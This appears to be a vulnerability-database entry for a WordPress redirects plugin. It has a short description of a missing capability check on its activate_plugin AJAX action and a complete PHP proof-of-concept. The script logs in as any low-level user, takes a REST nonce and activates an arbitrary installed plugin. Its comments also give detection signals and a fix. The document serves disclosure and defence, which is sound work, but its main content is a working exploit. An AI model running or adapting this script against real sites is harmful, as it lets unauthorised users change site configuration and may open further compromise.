In the plugin, a lack of capability checks and an insufficient nonce check on the AJAX action simple301redirects/admin/activate_plugin made it possible for any authenticated user to activate arbitrary plugins already installed on vulnerable sites.
<?php
// Proof-of-concept for the issue described above: the plugin's AJAX action
// simple301redirects/admin/activate_plugin activated an arbitrary installed
// plugin with no capability check and only a nonce check that any logged-in
// user could satisfy. The three requests below are the chain a defender
// should expect to see in access logs when this was abused. Needs ext-curl.

// Settings: target site and credentials are taken from the command line.
// Usage: php <this-script> <site-url> <username> <password>
$siteurl = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

echo 'Logging in!';

// 1) Log in as a subscriber-level (or higher) user. Session cookies are
//    persisted to a temporary cookie jar that the later requests reuse.
//    NOTE(review): the jar (holding the session cookie) is never unlinked,
//    so it stays in the temp dir after the script exits.
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log' => $wp_user,
    'pwd' => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit' => 'Log+In',
]);
// NOTE(review): the login response is not checked; a failed login is only
// noticed indirectly when the later requests come back without a nonce.
$output = curl_exec($ch);
curl_close($ch);

echo 'Getting REST API Nonce!';

// 2) Fetch a REST API nonce from core's admin-ajax.php?action=rest-nonce.
//    This is the value the plugin accepted in its 'security' field — the
//    "insufficient nonce check" from the description: it only proves the
//    caller has a session, not that the caller may activate plugins.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

// Rest Nonce: the pattern captures the first run of non-quote characters,
// i.e. effectively the whole body (the endpoint presumably returns the bare
// nonce). NOTE(review): preg_match's result is not checked, so an empty
// body leaves $matches without index 1 and $restnonce becomes null.
preg_match('/([^"]+)/', $content, $matches);
$restnonce = $matches[1];
echo $restnonce;

echo 'Activating Plugin!';

// 3) Activating Plugin: POST the vulnerable action with the REST nonce and
//    the basename of an installed plugin. Detection signal: a POST to
//    /wp-admin/admin-ajax.php with
//    action=simple301redirects/admin/activate_plugin from a non-administrator
//    session. Mitigation: the handler must require the 'activate_plugins'
//    capability and verify a nonce issued specifically for this action.
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php' );
// Static User-Agent used by the PoC; a fingerprint worth noting when
// reviewing logs, though trivially changed.
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'action' => 'simple301redirects/admin/activate_plugin',
    'security' => $restnonce,
    'basename' => 'wordfence/wordfence.php',
] );
$output = curl_exec($ch);
curl_close($ch);
// The AJAX handler's response body is printed verbatim for inspection.
print($output)
?>
Chloe Chamberland
Chloe Chamberland
Yes
2021-05-26 (about 12 months ago)
2021-05-26 (about 12 months ago)
2021-05-28 (about 12 months ago)